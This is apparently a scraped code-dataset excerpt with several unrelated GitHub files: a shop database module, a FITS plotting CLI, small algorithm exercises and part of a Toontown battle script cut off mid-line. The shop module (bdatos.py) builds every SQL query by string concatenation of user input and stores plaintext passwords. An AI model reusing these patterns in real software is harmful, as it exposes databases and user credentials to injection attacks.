model.score(x,y)\nprint(ordenada)\nprint(pendiente)\nprint(R2)\n\n\n","repo_name":"valenanton-26/labo-de-datos-1C2023","sub_path":"c-17.py","file_name":"c-17.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"5962214972","text":"import psycopg2\n\ndb = psycopg2.connect(host=[host], database=[dbproject], user=[userbd], password=[password_bd])\n\n\n\ndef queryDatos(user, contra):\n\n sql = \"SELECT * FROM clientes WHERE correo='\"+str(user)+\"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n\n email=row[6]\n contrasenia=row[7]\n\n if email == user and contrasenia == contra:\n return True\n else:\n return False\n\ndef existeuser(id):\n sql = \"select exists(select 1 from clientes where cedula='\"+str(id)+\"');\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n dato = row[0]\n\n\n return dato\n\n\n\ndef perfiluser(user):\n\n dato=0\n sql = \"SELECT * FROM clientes WHERE correo='\"+str(user)+\"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n dato = row[1]\n return dato\n\ndef nombreuser(user):\n\n sql = \"SELECT * FROM clientes WHERE correo='\" + str(user) + \"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n nombre = row[2]+\" \"+row[3]\n return nombre\n\ndef ciuser(user):\n\n sql = \"SELECT * FROM clientes WHERE correo='\" + str(user) + \"'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n ci = row[0]\n return ci\n\ndef listaproductosg():\n\n sql = \"SELECT * FROM productos \"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef mostrarproducto(id):\n\n sql = \"select * from productos where id_producto=\"+id\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n\n for row in data:\n cat = row[5]\n\n\n return data,cat\n\ndef mprodcat(categoria,id):\n\n sql = \"select * from productos where tipo='\" + str(categoria) + \"' and id_producto<>\"+id\n cursor = db.cursor()\n 
cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\n\ndef nuevocliente(cedula,nombre,apellido,telefono,direccion,correo,clave):\n try:\n sql=\"INSERT INTO CLIENTES (cedula,id_perfil,nombre,apellido,telefono,direccion,correo,clave) values \" \\\n \"('\"+str(cedula)+\"','1','\"+str(nombre)+\"','\"+str(apellido)+\"','\"+str(telefono)+\"','\"+str(direccion)+\"','\"+str(correo)+\"','\"+str(clave)+\"');\"\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return False\n\n\ndef verprocompara(id):\n\n sql = \"SELECT nombreprod,caracteristicas,imagen FROM PRODUCTOS where id_producto=\"+id\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef agcarrito(cedula,nite,idpro):\n\n try:\n sql = \"INSERT INTO carro (id_producto,cedula,cantidad) values \" \\\n \"('\" + str(idpro) + \"','\" + str(cedula) + \"','\" + str(nite) + \"');\"\n #print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n\n except:\n return False\n\n\n\ndef visualcarrito(cedula):\n\n sql = \"SELECT CARRO.ID_CARRITO,PRODUCTOS.NOMBREPROD,PRODUCTOS.IMAGEN,CARRO.CANTIDAD,(PRODUCTOS.PRECIO*CARRO.CANTIDAD) \" \\\n \"AS SUBTOTAL FROM CARRO,PRODUCTOS WHERE CARRO.ID_PRODUCTO = PRODUCTOS.ID_PRODUCTO AND CARRO.CEDULA='\"+str(cedula)+\"';\"\n\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\ndef vsubtotal(cedula):\n sql = \"SELECT SUM(PRODUCTOS.PRECIO*CARRO.CANTIDAD) FROM CARRO,PRODUCTOS WHERE CARRO.ID_PRODUCTO = PRODUCTOS.ID_PRODUCTO AND CARRO.CEDULA='\" + str(\n cedula) + \"';\"\n\n cursor = db.cursor()\n cursor.execute(sql)\n data1 = cursor.fetchall()\n for row in data1:\n stotal = row[0]\n\n return stotal\n\ndef prodgoogle():\n\n sql=\"select * from productos where tipo='G'\"\n sql1 = \"select * from productos where tipo='A'\"\n sql2 = \"select * from productos where tipo='X'\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n cursor1 = db.cursor()\n cursor1.execute(sql1)\n data1 = cursor1.fetchall()\n\n cursor2 = db.cursor()\n cursor2.execute(sql2)\n data2 = cursor2.fetchall()\n return data,data1,data2\n\n#######metodos para conteo ###############\n\ndef numerogeneralpro():\n\n sql = \"select count(*)as registros from productos;\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralprog():\n\n sql = \"select count(*)as registros from productos where tipo='G';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralproa():\n\n sql = \"select count(*)as registros from productos where tipo='A';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef numerogeneralprox():\n\n sql = \"select count(*)as registros from productos where tipo='X';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\ndef cantidadcarrito(id):\n\n sql=\"SELECT count(*) from carro where cedula='\"+str(id)+\"';\"\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n for row in data:\n data = row[0]\n\n return data\n\n\ndef eliminarcarrito(id,cedula):\n try:\n sql=\"delete from carro where id_carrito='\"+str(id)+\"' and cedula='\"+str(cedula)+\"';\"\n \n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return 
False\n\n\ndef factura(cedula,nump,subtotal,total,fecha):\n\n try:\n sql = \"INSERT INTO factura (cedula,numproductos,subtotal,total,fecha) values \" \\\n \"('\" + str(cedula) + \"','\" + str(nump) + \"','\" + str(subtotal) + \"','\"+str(total)+\"','\"+str(fecha)+\"');\"\n print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n\n except:\n return False\n\ndef carritoel(cedula):\n try:\n sql=\"delete from carro where cedula='\"+str(cedula)+\"'\"\n print(sql)\n cursor = db.cursor()\n cursor.execute(sql)\n db.commit()\n return True\n except:\n return False\n\n\ndef verfacturas(cedula):\n\n sql = \"SELECT * FROM FACTURA WHERE CEDULA='\"+str(cedula)+\"';\"\n print(\"visual\"+sql)\n cursor = db.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n\n return data\n\n\n#select * from factura where cedula='1234567890'\n\n","repo_name":"jonathanpastas/calidad_sw_tienda","sub_path":"bdatos.py","file_name":"bdatos.py","file_ext":"py","file_size_in_byte":6627,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13110096493","text":"import os\nimport sys\nimport argparse\nimport logging\nimport logging.handlers\nimport traceback\nimport importlib\n\n#--------------\n# local imports\n# -------------\n\nfrom azotea import __version__\nfrom azofits.utils import IMAGE_TYPES, SW_CREATORS, SW_MODIFIER, fits_image_type, fits_swcreator\n\nfrom azotea.utils.camera import BAYER_PTN_LIST\n\n\n# ----------------\n# Module constants\n# ----------------\n\nLOG_CHOICES = ('critical', 'error', 'warn', 'info', 'debug')\n\n# -----------------------\n# Module global variables\n# -----------------------\n\nlog = logging.getLogger('azoplot')\n\n# ----------\n# Exceptions\n# ----------\n\n\n# ------------------------\n# Module utility functions\n# ------------------------\n\ndef configureLogging(options):\n if options.verbose:\n level = logging.DEBUG\n elif options.quiet:\n level = logging.WARN\n else:\n level = logging.INFO\n \n log.setLevel(level)\n # Log formatter\n #fmt = logging.Formatter('%(asctime)s - %(name)s [%(levelname)s] %(message)s')\n fmt = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')\n # create console handler and set level to debug\n if options.console:\n ch = logging.StreamHandler()\n ch.setFormatter(fmt)\n ch.setLevel(level)\n log.addHandler(ch)\n # Create a file handler suitable for logrotate usage\n if options.log_file:\n #fh = logging.handlers.WatchedFileHandler(options.log_file)\n fh = logging.handlers.TimedRotatingFileHandler(options.log_file, when='midnight', interval=1, backupCount=365)\n fh.setFormatter(fmt)\n fh.setLevel(level)\n log.addHandler(fh)\n\ndef validfile(path):\n if not os.path.isfile(path):\n raise IOError(f\"Not valid or existing file: {path}\")\n return path\n\ndef validdir(path):\n if not os.path.isdir(path):\n raise IOError(f\"Not valid or existing directory: {path}\")\n return path\n\n \n# -----------------------\n# Module global functions\n# -----------------------\n\ndef createParser():\n # create the top-level parser\n name = os.path.split(os.path.dirname(sys.argv[0]))[-1]\n parser = argparse.ArgumentParser(prog=name, description='FITS batch editor for AZOTEA')\n\n # Global options\n parser.add_argument('--version', action='version', version='{0} {1}'.format(name, __version__))\n parser.add_argument('-c', '--console', action='store_true', help='log to console.')\n parser.add_argument('-l', '--log-file', type=str, default=None, action='store', metavar='', help='log to 
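[editor's note] Every query in the bdatos.py record above is assembled by string concatenation, which is an SQL injection vector and also breaks on inputs containing quotes. psycopg2 accepts parameterized queries; here is a sketch of queryDatos rewritten that way. Table and column names follow the schema implied by the original (correo, clave in clientes), db is the module-level connection opened at the top of that file, and the plaintext password comparison is kept as-is, though hashing would be the natural next fix:

def queryDatos(user, contra):
    # %s placeholders are filled in by psycopg2, which quotes values safely.
    sql = "SELECT correo, clave FROM clientes WHERE correo = %s"
    cursor = db.cursor()
    cursor.execute(sql, (user,))
    row = cursor.fetchone()
    return row is not None and row[0] == user and row[1] == contra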
file')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-v', '--verbose', action='store_true', help='Verbose logging output.')\n group.add_argument('-q', '--quiet', action='store_true', help='Quiet logging output.')\n\n\n # --------------------------\n # Create first level parsers\n # --------------------------\n\n subparser = parser.add_subparsers(dest='command')\n\n parser_image = subparser.add_parser('image', help='image command')\n \n # ---------------------------------------\n # Create second level parsers for 'image'\n # ---------------------------------------\n\n subparser = parser_image.add_subparsers(dest='subcommand')\n iplot = subparser.add_parser('stats', help=\"Plot image stats\")\n group = iplot.add_mutually_exclusive_group(required=True)\n group.add_argument('-d', '--images-dir', type=validdir, action='store', metavar='', help='Images directory')\n group.add_argument('-f', '--image-file', type=validfile, action='store', metavar='', help='single FITS file path') \n iplot.add_argument('-x','--width', type=int, default=500, help=\"Region of interest width [pixels].\")\n iplot.add_argument('-y','--height', type=int, default=400, help=\"Region of interest height [pixels].\")\n iplot.add_argument('--x0', type=int, default=None, help=\"Region of interest X origin [pixels].\")\n iplot.add_argument('--y0', type=int, default=None, help=\"Region of interest Y height [pixels].\")\n iplot.add_argument('-b','--bayer', choices=BAYER_PTN_LIST, default=None, help='Bayer pattern layout')\n iplot.add_argument('--vmin', type=int, default=None, help='minumim pixel value to display')\n iplot.add_argument('--vmax', type=int, default=None, help='maximum pixel value to display')\n iplot.add_argument('--plot-sigma', type=int, choices=range(1,6), default=2, help='# of sigmas when autoscaling')\n\n return parser\n\n \n\n# ================ #\n# MAIN ENTRY POINT #\n# ================ #\n\ndef main():\n '''\n Utility entry point\n '''\n try:\n options = createParser().parse_args(sys.argv[1:])\n configureLogging(options)\n name = os.path.split(os.path.dirname(sys.argv[0]))[-1]\n log.info(f\"============== {name} {__version__} ==============\")\n package = f\"{name}\"\n command = f\"{options.command}\"\n subcommand = f\"{options.subcommand}\"\n try: \n command = importlib.import_module(command, package=package)\n except ModuleNotFoundError: # when debugging module in git source tree ...\n command = f\".{options.command}\"\n command = importlib.import_module(command, package=package)\n getattr(command, subcommand)(options)\n except KeyboardInterrupt as e:\n log.critical(\"[%s] Interrupted by user \", __name__)\n except Exception as e:\n traceback.print_exc()\n log.critical(\"[%s] Fatal error => %s\", __name__, str(e) )\n finally:\n pass\n\nmain()\n","repo_name":"actionprojecteu/azotea-client","sub_path":"src/azoplot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"70432454676","text":"'''\n우선순위 오름차순\n(\n+-\n*/\n)\n이다.\n우선순위 낮은 연산자를 만날 때까지 pop을 하면서 출력을 하면 된다.\n'''\n\nd = {\n ')': 0,\n '(': 1,\n '+': 2,\n '-': 2,\n '*': 3,\n '/': 3,\n}\npre = input() + ')'\nst = ['(']\nr = []\nfor s in pre:\n if s != '(':\n while st and d.get(st[-1], 4) >= d.get(s, 4):\n tmp = st.pop()\n if tmp != '(':\n r.append(tmp)\n else:\n break\n if s != ')':\n 
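[editor's note] For orientation, main() in the azoplot record above resolves options.command and options.subcommand to a module and a function via importlib, so "azoplot image stats ..." ends up calling stats(options) in an image module. The dispatch, condensed into a sketch of the same pattern (it omits the original's ModuleNotFoundError fallback between absolute and relative imports):

import importlib

def dispatch(options, package="azoplot"):
    # "image stats ..." -> import the image module, call its stats(options).
    module = importlib.import_module("." + options.command, package=package)
    handler = getattr(module, options.subcommand)
    return handler(options)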
st.append(s)\n\nprint(''.join(r))","repo_name":"PyeongGang-Kim/TIL","sub_path":"algorithm/백준/1918.py","file_name":"1918.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"4930064666","text":"matches = {} #first output\ntotal_scores = [] #second output\nplscr = {} #stores player scores temporarily.\nfor _ in range(int(input())):\n match_name = input().split(':',) #match_name[0] is the match's name.\n matches[match_name[0]] = {}\n temp1 = match_name[1].split(',') #stores '-' seperated player name,score temporarily.\n for j in range(len(temp1)):\n temp2 = temp1[j].split('-') #temp2[0] is player name and [1] is score.\n matches[match_name[0]][temp2[0]] = temp2[1] #store score in nested dictionary.\n if temp2[0] in plscr: #add to previous score or create new player.\n plscr[temp2[0]] += int(temp2[1])\n else:\n plscr[temp2[0]] = int(temp2[1]) \n\nfor pl, sc in plscr.items(): #form a list of tuples of keys and indexes.\n total_scores.append((pl,sc)) \n \nprint(matches)\nprint(total_scores)\n","repo_name":"MananKGarg/SOC_20_Virtual_Keyboard","sub_path":"Assignment 1/Team 5/Jeff_Problem_1.py","file_name":"Jeff_Problem_1.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"84"} +{"seq_id":"41423145509","text":"VOWELS = ('a', 'e', 'i', 'o', 'u', 'yt', 'xr')\n\nCONSONANTS = ('b', 'c', 'd', 'f', 'g',\n 'h', 'j', 'k', 'l', 'm',\n 'n', 'p', 'q', 'r', 's',\n 't', 'v', 'w', 'x', 'y',\n 'z', 'sh', 'sch', 'zz', 'gh',\n 'ch', 'th', 'qu', 'thr',\n 'squ')\n\n\ndef translate(sentence):\n result = []\n for word in sentence.split(' '):\n if word[:3] in CONSONANTS:\n word = word[3:] + word[:3]\n elif word[:2] in CONSONANTS:\n word = word[2:] + word[:2]\n elif word[0] in CONSONANTS and word[:2] not in VOWELS:\n word = word[1:] + word[0]\n\n result.append(word + 'ay')\n return \" \".join(result)\n","repo_name":"j-mak/python3-exercism.io","sub_path":"pig-latin/pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"24112548969","text":"from toontown.toonbase.ToontownBattleGlobals import *\nfrom .BattleBase import *\nfrom direct.interval.IntervalGlobal import *\nfrom direct.showbase import DirectObject\nfrom . import MovieFire\nfrom . import MovieSOS\nfrom . import MovieNPCSOS\nfrom . import MoviePetSOS\nfrom . import MovieHeal\nfrom . import MovieTrap\nfrom . import MovieLure\nfrom . import MovieSound\nfrom . import MovieThrow\nfrom . import MovieSquirt\nfrom . import MovieDrop\nfrom . import MovieSuitAttacks\nfrom . import MovieToonVictory\nfrom . import PlayByPlayText\nfrom . import BattleParticles\nfrom toontown.distributed import DelayDelete\nfrom . import BattleExperience\nfrom .SuitBattleGlobals import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom . import RewardPanel\nimport random\nfrom . 
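[editor's note] The Korean docstring in the 1918.py record above translates roughly as: "precedence ascends in the listed order; keep popping and printing from the stack until an operator of lower precedence is met." That is the classic infix-to-postfix (shunting-yard) conversion. The same algorithm restated with English comments — identifiers renamed for clarity, behaviour matching the original, including its sentinel-parenthesis trick:

# Precedence: ')' < '(' < '+','-' < '*','/'; operands default to 4.
PRECEDENCE = {')': 0, '(': 1, '+': 2, '-': 2, '*': 3, '/': 3}

def to_postfix(expr):
    stack, out = ['('], []            # sentinel '(' so the stack is never empty
    for ch in expr + ')':             # trailing ')' flushes everything at the end
        if ch != '(':
            # Emit whatever on the stack binds at least as tightly as ch;
            # operands (precedence 4) are flushed by the very next token.
            while stack and PRECEDENCE.get(stack[-1], 4) >= PRECEDENCE.get(ch, 4):
                top = stack.pop()
                if top == '(':        # the matching '(' ends the flush, discarded
                    break
                out.append(top)
        if ch != ')':
            stack.append(ch)
    return ''.join(out)

# to_postfix('A*(B+C)-D') -> 'ABC+*D-'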
import MovieUtil\nfrom toontown.toon import Toon\nfrom toontown.toonbase import ToontownGlobals\nfrom toontown.toontowngui import TTDialog\nimport copy\nimport functools\nfrom toontown.toonbase import TTLocalizer\nfrom toontown.toon import NPCToons\ncamPos = Point3(14, 0, 10)\ncamHpr = Vec3(89, -30, 0)\nrandomBattleTimestamp = base.config.GetBool('random-battle-timestamp', 0)\n\nclass Movie(DirectObject.DirectObject):\n notify = DirectNotifyGlobal.directNotify.newCategory('Movie')\n\n def __init__(self, battle):\n self.battle = battle\n self.track = None\n self.rewardPanel = None\n self.rewardCallback = None\n self.playByPlayText = PlayByPlayText.PlayByPlayText()\n self.playByPlayText.hide()\n self.renderProps = []\n self.hasBeenReset = 0\n self.reset()\n self.rewardHasBeenReset = 0\n self.resetReward()\n return\n\n def cleanup(self):\n self.reset()\n self.resetReward()\n self.battle = None\n if self.playByPlayText != None:\n self.playByPlayText.cleanup()\n self.playByPlayText = None\n if self.rewardPanel != None:\n self.rewardPanel.cleanup()\n self.rewardPanel = None\n self.rewardCallback = None\n return\n\n def needRestoreColor(self):\n self.restoreColor = 1\n\n def clearRestoreColor(self):\n self.restoreColor = 0\n\n def needRestoreHips(self):\n self.restoreHips = 1\n\n def clearRestoreHips(self):\n self.restoreHips = 0\n\n def needRestoreHeadScale(self):\n self.restoreHeadScale = 1\n\n def clearRestoreHeadScale(self):\n self.restoreHeadScale = 0\n\n def needRestoreToonScale(self):\n self.restoreToonScale = 1\n\n def clearRestoreToonScale(self):\n self.restoreToonScale = 0\n\n def needRestoreParticleEffect(self, effect):\n self.specialParticleEffects.append(effect)\n\n def clearRestoreParticleEffect(self, effect):\n if self.specialParticleEffects.count(effect) > 0:\n self.specialParticleEffects.remove(effect)\n\n def needRestoreRenderProp(self, prop):\n self.renderProps.append(prop)\n\n def clearRenderProp(self, prop):\n if self.renderProps.count(prop) > 0:\n self.renderProps.remove(prop)\n\n def restore(self):\n return\n for toon in self.battle.activeToons:\n toon.loop('neutral')\n origPos, origHpr = self.battle.getActorPosHpr(toon)\n toon.setPosHpr(self.battle, origPos, origHpr)\n hands = toon.getRightHands()[:]\n hands += toon.getLeftHands()\n for hand in hands:\n props = hand.getChildren()\n for prop in props:\n if prop.getName() != 'book':\n MovieUtil.removeProp(prop)\n\n if self.restoreColor == 1:\n headParts = toon.getHeadParts()\n torsoParts = toon.getTorsoParts()\n legsParts = toon.getLegsParts()\n partsList = [headParts, torsoParts, legsParts]\n for parts in partsList:\n for partNum in range(0, parts.getNumPaths()):\n nextPart = parts.getPath(partNum)\n nextPart.clearColorScale()\n nextPart.clearTransparency()\n\n if self.restoreHips == 1:\n parts = toon.getHipsParts()\n for partNum in range(0, parts.getNumPaths()):\n nextPart = parts.getPath(partNum)\n props = nextPart.getChildren()\n for prop in props:\n if prop.getName() == 'redtape-tube.egg':\n MovieUtil.removeProp(prop)\n\n if self.restoreHeadScale == 1:\n headScale = ToontownGlobals.toonHeadScales[toon.style.getAnimal()]\n for lod in toon.getLODNames():\n toon.getPart('head', lod).setScale(headScale)\n\n if self.restoreToonScale == 1:\n toon.setScale(1)\n headParts = toon.getHeadParts()\n for partNum in range(0, headParts.getNumPaths()):\n part = headParts.getPath(partNum)\n part.setHpr(0, 0, 0)\n part.setPos(0, 0, 0)\n\n arms = toon.findAllMatches('**/arms')\n sleeves = toon.findAllMatches('**/sleeves')\n hands = 
toon.findAllMatches('**/hands')\n for partNum in range(0, arms.getNumPaths()):\n armPart = arms.getPath(partNum)\n sleevePart = sleeves.getPath(partNum)\n handsPart = hands.getPath(partNum)\n armPart.setHpr(0, 0, 0)\n sleevePart.setHpr(0, 0, 0)\n handsPart.setHpr(0, 0, 0)\n\n for suit in self.battle.activeSuits:\n if suit._Actor__animControlDict != None:\n suit.loop('neutral')\n suit.battleTrapIsFresh = 0\n origPos, origHpr = self.battle.getActorPosHpr(suit)\n suit.setPosHpr(self.battle, origPos, origHpr)\n hands = [suit.getRightHand(), suit.getLeftHand()]\n for hand in hands:\n props = hand.getChildren()\n for prop in props:\n MovieUtil.removeProp(prop)\n\n for effect in self.specialParticleEffects:\n if effect != None:\n effect.cleanup()\n\n self.specialParticleEffects = []\n for prop in self.renderProps:\n MovieUtil.removeProp(prop)\n\n self.renderProps = []\n return\n\n def _deleteTrack(self):\n if self.track:\n DelayDelete.cleanupDelayDeletes(self.track)\n self.track = None\n return\n\n def reset(self, finish = 0):\n if self.hasBeenReset == 1:\n return\n self.hasBeenReset = 1\n self.stop()\n self._deleteTrack()\n if finish == 1:\n self.restore()\n self.toonAttackDicts = []\n self.suitAttackDicts = []\n self.restoreColor = 0\n self.restoreHips = 0\n self.restoreHeadScale = 0\n self.restoreToonScale = 0\n self.specialParticleEffects = []\n for prop in self.renderProps:\n MovieUtil.removeProp(prop)\n\n self.renderProps = []\n\n def resetReward(self, finish = 0):\n if self.rewardHasBeenReset == 1:\n return\n self.rewardHasBeenReset = 1\n self.stop()\n self._deleteTrack()\n if finish == 1:\n self.restore()\n self.toonRewardDicts = []\n if self.rewardPanel != None:\n self.rewardPanel.destroy()\n self.rewardPanel = None\n return\n\n def play(self, ts, callback):\n self.hasBeenReset = 0\n ptrack = Sequence()\n camtrack = Sequence()\n if random.random() > 0.5:\n MovieUtil.shotDirection = 'left'\n else:\n MovieUtil.shotDirection = 'right'\n for s in self.battle.activeSuits:\n s.battleTrapIsFresh = 0\n\n tattacks, tcam = self.__doToonAttacks()\n if tattacks:\n ptrack.append(tattacks)\n camtrack.append(tcam)\n sattacks, scam = self.__doSuitAttacks()\n if sattacks:\n ptrack.append(sattacks)\n camtrack.append(scam)\n ptrack.append(Func(callback))\n self._deleteTrack()\n self.track = Sequence(ptrack, name='movie-track-%d' % self.battle.doId)\n if self.battle.localToonPendingOrActive():\n self.track = Parallel(self.track, Sequence(camtrack), name='movie-track-with-cam-%d' % self.battle.doId)\n if randomBattleTimestamp == 1:\n randNum = random.randint(0, 99)\n dur = self.track.getDuration()\n ts = float(randNum) / 100.0 * dur\n self.track.delayDeletes = []\n for suit in self.battle.suits:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(suit, 'Movie.play'))\n\n for toon in self.battle.toons:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(toon, 'Movie.play'))\n\n self.track.start(ts)\n return None\n\n def finish(self):\n self.track.finish()\n return None\n\n def playReward(self, ts, name, callback, noSkip = False):\n self.rewardHasBeenReset = 0\n ptrack = Sequence()\n camtrack = Sequence()\n self.rewardPanel = RewardPanel.RewardPanel(name)\n self.rewardPanel.hide()\n victory, camVictory, skipper = MovieToonVictory.doToonVictory(self.battle.localToonActive(), self.battle.activeToons, self.toonRewardIds, self.toonRewardDicts, self.deathList, self.rewardPanel, 1, self.uberList, self.helpfulToonsList, noSkip=noSkip)\n if victory:\n skipper.setIvals((ptrack, camtrack), 
ptrack.getDuration())\n ptrack.append(victory)\n camtrack.append(camVictory)\n ptrack.append(Func(callback))\n self._deleteTrack()\n self.track = Sequence(ptrack, name='movie-reward-track-%d' % self.battle.doId)\n if self.battle.localToonActive():\n self.track = Parallel(self.track, camtrack, name='movie-reward-track-with-cam-%d' % self.battle.doId)\n self.track.delayDeletes = []\n for t in self.battle.activeToons:\n self.track.delayDeletes.append(DelayDelete.DelayDelete(t, 'Movie.playReward'))\n\n skipper.setIvals((self.track,), 0.0)\n skipper.setBattle(self.battle)\n self.track.start(ts)\n return None\n\n def playTutorialReward(self, ts, name, callback):\n self.rewardHasBeenReset = 0\n self.rewardPanel = RewardPanel.RewardPanel(name)\n self.rewardCallback = callback\n self.questList = self.rewardPanel.getQuestIntervalList(base.localAvatar, [0,\n 1,\n 1,\n 0], [base.localAvatar], base.localAvatar.quests[0], [], [base.localAvatar.getDoId()])\n camera.setPosHpr(0, 8, base.localAvatar.getHeight() * 0.66, 179, 15, 0)\n self.playTutorialReward_1()\n\n def playTutorialReward_1(self):\n self.tutRewardDialog_1 = TTDialog.TTDialog(text=TTLocalizer.MovieTutorialReward1, command=self.playTutorialReward_2, style=TTDialog.Acknowledge, fadeScreen=None, pos=(0.65, 0, 0.5), scale=0.8)\n self.tutRewardDialog_1.hide()\n self._deleteTrack()\n self.track = Sequence(name='tutorial-reward-1')\n self.track.append(Func(self.rewardPanel.initGagFrame, base.localAvatar, [0,\n 0,\n 0,\n 0,\n 0,\n 0,\n 0], [0,\n 0,\n 0,\n 0], noSkip=True))\n self.track += self.rewardPanel.getTrackIntervalList(base.localAvatar, THROW_TRACK, 0, 1, 0)\n self.track.append(Func(self.tutRewardDialog_1.show))\n self.track.start()\n return\n\n def playTutorialReward_2(self, value):\n self.tutRewardDialog_1.cleanup()\n self.tutRewardDialog_2 = TTDialog.TTDialog(text=TTLocalizer.MovieTutorialReward2, command=self.playTutorialReward_3, style=TTDialog.Acknowledge, fadeScreen=None, pos=(0.65, 0, 0.5), scale=0.8)\n self.tutRewardDialog_2.hide()\n self._deleteTrack()\n self.track = Sequence(name='tutorial-reward-2')\n self.track.append(Wait(1.0))\n self.track += self.rewardPanel.getTrackIntervalList(base.localAvatar, SQUIRT_TRACK, 0, 1, 0)\n self.track.append(Func(self.tutRewardDialog_2.show))\n self.track.start()\n return\n\n def playTutorialReward_3(self, value):\n self.tutRewardDialog_2.cleanup()\n from toontown.toon import Toon\n from toontown.toon import ToonDNA\n\n def doneChat1(page, elapsed = 0):\n self.track2.start()\n\n def doneChat2(elapsed):\n self.track2.pause()\n self.track3.start()\n\n def uniqueName(hook):\n return 'TutorialTom-' + hook\n\n self.tutorialTom = Toon.Toon()\n dna = ToonDNA.ToonDNA()\n dnaList = ('dll', 'ms', 'm', 'm', 7, 0, 7, 7, 2, 6, 2, 6, 2, 16)\n dna.newToonFromProperties(*dnaList)\n self.tutorialTom.setDNA(dna)\n self.tutorialTom.setName(TTLocalizer.NPCToonNames[20000])\n self.tutorialTom.uniqueName = uniqueName\n if base.config.GetString('language', 'english') == 'japanese':\n self.tomDialogue03 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward01.ogg')\n self.tomDialogue04 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward02.ogg')\n self.tomDialogue05 = base.loader.loadSfx('phase_3.5/audio/dial/CC_tom_movie_tutorial_reward03.ogg')\n self.musicVolume = base.config.GetFloat('tutorial-music-volume', 0.5)\n else:\n self.tomDialogue03 = None\n self.tomDialogue04 = None\n self.tomDialogue05 = None\n self.musicVolume = 0.9\n music = base.cr.playGame.place.loader.battleMusic\n 
if self.questList:\n self.track1 = Sequence(Wait(1.0), Func(self.rewardPanel.initQuestFrame, base.localAvatar, copy.deepcopy(base.localAvatar.quests)), Wait(1.0), Sequence(*self.questList), Wait(1.0), Func(self.rewardPanel.hide), Func(camera.setPosHpr, render, 34, 19.88, 3.48, -90, -2.36, 0), Func(base.localAvatar.animFSM.request, 'neutral'), Func(base.localAvatar.setPosHpr, 40.31, 22.0, -0.47, 150.0, 360.0, 0.0), Wait(0.5), Func(self.tutorialTom.reparentTo, render), Func(self.tutorialTom.show), Func(self.tutorialTom.setPosHpr, 40.29, 17.9, -0.47, 11.31, 0.0, 0.07), Func(self.tutorialTom.animFSM.request, 'TeleportIn'), Wait(1.517), Func(self.tutorialTom.animFSM.request, 'neutral'), Func(self.acceptOnce, self.tutorialTom.uniqueName('doneChatPage'), doneChat1), Func(self.tutorialTom.addActive), Func(music.setVolume, self.musicVolume), Func(self.tutorialTom.setLocalPageChat, TTLocalizer.MovieTutorialReward3, 0, None, [self.tomDialogue03]), name='tutorial-reward-3a')\n self.track2 = Sequence(Func(self.acceptOnce, self.tutorialTom.uniqueName('doneChatPage'), doneChat2), Func(self.tutorialTom.setLocalPageChat, TTLocalizer.MovieTutorialReward4, 1, None, [self.tomDialogue04]), Func(self.tutorialTom.setPlayRate, 1.5, 'right-hand-start'), Func(self.tutorialTom.play, 'right-hand-start'), Wait(self.tutorialTom.getDuration('right-hand-start') / 1.5), Func(self.tutorialTom.loop, 'right-hand'), name='tutorial-reward-3b')\n self.track3 = Parallel(Sequence(Func(self.tutorialTom.setPlayRate, -1.8, 'right-hand-start'), Func(self.tutorialTom.play, 'right-hand-start'), Wait(self.tutorialTom.getDuration('right-hand-start') / 1.8), Func(self.tutorialTom.animFSM.request, 'neutral'), name='tutorial-reward-3ca'), Sequence(Wait(0.5), Func(self.tutorialTom.setChatAbsolute, 